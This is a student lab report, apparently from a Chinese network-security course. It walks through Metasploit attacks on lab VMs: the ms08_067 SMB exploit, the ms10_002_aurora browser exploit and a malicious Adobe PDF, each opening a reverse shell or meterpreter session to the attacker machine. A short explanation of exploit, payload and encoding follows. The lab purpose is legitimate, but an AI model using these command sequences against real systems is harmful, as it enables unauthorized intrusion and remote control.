20155304《網絡對抗》MSF基礎應用
20155304《網絡對抗》MSF基礎應用
實踐內容
本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
1.1一個主動攻擊實踐,如ms08_067;
1.2 一個針對瀏覽器的攻擊,如ms11_050;
1.3 一個針對客戶端的攻擊,如Adobe;
1.4 成功應用任何一個輔助模塊。
1.1主動攻擊:ms08_067
使用靶機1和Kali
先msfconsole進入msf,再用search ms08_067查詢一下針對該漏洞的攻擊模塊:
用use exploit/windows/smb/ms08_067_netapi使用該模塊
用show targets查看可以被攻擊的靶機的操作系統型號:
用show payloads查看可以供我們使用的攻擊載荷:
從中找到一個可用的攻擊載荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp設置payload:
用show options查看需要設置的參數:
這裏需要設置RHOST(靶機IP)和LHOST(Kali的IP)
設置target選項目標
用show options確認需要設置的參數是否已經設置好:
用exploit指令開始攻擊
攻擊成功後會獲取靶機的shell,可以對其進行操作:
1.2針對瀏覽器的攻擊:MS10_002_aurora漏洞攻擊
msf > use windows/browser/ms10_002_aurora調用出該模塊,然後設置tcp反彈連接
查看需要修改的參數
SRVHOST和LHOST的ip為攻擊機的ip。設置好參數後,exploit
攻擊成功,輸入sessions -i -1,查看XP桌面信息
還有靶機的ip信息等
1.3針對客戶端的攻擊:adobe_toolbutton
用search adobe查詢一下針對該漏洞的攻擊模塊:
選擇一個模塊使用
用show targets查看可以被攻擊的靶機的操作系統型號:
,使用命令set payload windows/meterpreter/reverse_tcp設置payload攻擊載荷
用show options查看需要設置的參數:
設置相應參數,實施exploit攻擊,在/root/.msf4/local/目錄下成功生成了一.pdf文件
將pdf文件粘貼到靶機win xp
在kali中和前幾次實驗一樣打開並設置監聽模塊use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再設置IP以及端口
在靶機上打開剛剛那個pdf文件,可以觀察到Kali成功獲取了靶機的shell,可以對其進行操作:
1.4 成功應用任何一個輔助模塊:
查看都有什麽輔助模塊:
我選擇了這個
info查看、設置好要設置的參數
可以查看系統信息了:
基礎問題回答
(1)用自己的話解釋什麽是exploit,payload,encode.
exploit:是破除門鎖的工具以及運送間諜的載具,相當於利用漏洞偷偷打開的管道,將做好的木馬病毒等順利傳輸到靶機。
payload:就是被運送的間諜,到了房子裏頭就可以執行各種間諜活動。簡單來說就是病毒代碼包裝成一個可執行的文件,或者包裝成指定的類型,然後通過管道傳輸進去後開始為我們控制靶機服務。
encode:是間諜穿的偽裝的衣服,便於間諜潛入目標針對payload進行編碼,就是對它進行包裝打扮,改變payload代碼特征,但是不改變payload為我們所用的特征,但能對payload進行加工。
實驗總結和收獲
通過這次實驗,我了解到了msf平臺的厲害,不僅可以利用多種輔助模塊獲取靶機信息,還能夠查看大部分存在的漏洞並利用這些漏洞實現不同攻擊,這裏面,更是可以直接實現主動攻擊,只要系統存在這個漏洞,就會被直接攻破,看來,實時更新系統是很有必要的
20155304《網絡對抗》MSF基礎應用